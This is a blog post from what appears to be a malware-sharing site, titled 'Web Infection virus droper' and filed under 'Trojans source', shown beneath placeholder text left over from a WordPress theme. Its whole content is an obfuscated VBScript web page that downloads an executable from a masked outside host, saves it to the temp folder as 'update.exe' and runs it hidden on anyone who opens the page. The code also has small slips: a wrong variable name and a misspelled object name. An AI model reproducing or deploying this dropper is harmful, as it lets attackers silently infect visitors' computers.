A little bit of yourself in this section. There are 3 three text graphics associated to this section; Subscribe me, Advertisements and About Me. I hope either one will suit your need.

Updates: Currently I'm testing on wordpress 2.5. I hope to release this theme real soon. So stay tune and dont forget to subscribe my blog. You can add more text here. Overflown text will be hidden, so make sure to end your text just right here. More...
Sep
6th

Web Infection virus droper

Author: admin | Files under Trojans source

<HTML>
<BODY>
<script language=”VBScript”>
on error resume next
dl = “http://XXXXXXXXX.com/virus.exe”
Set df = document.createElement(”object”)
cls1=”clsid:BD96″
cls2=”C556-65A”
cls3=”3-11D0-9″
cls4=”83A-00C04FC29E36″
clsfull=cls1&cls2&cls3&cls4
df.setAttribute “classid”,clsfull
strr1=”Mic”
strr2=”roso”
strr3=”ft.”
strr4=”XML”
strr5=”HTTP”
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,”")
ab1=”A”
ab2=”dod”
ab3=”b.S”
ab4=”t”
ab5=”re”
ab6=”am”
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,”")
YY.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fnamezz1=”update.exe”
scripp1=”Scrip”
scripp2=”ting”
scripp3=”.Fil”
scripp4=”eSyste”
scripp5=”mObject”
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,”")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject(”sh3ll.Application”,”")
MM.ShellExecute fnamezz1,”",”",”open”,0
</script>
</BODY>
</HTML>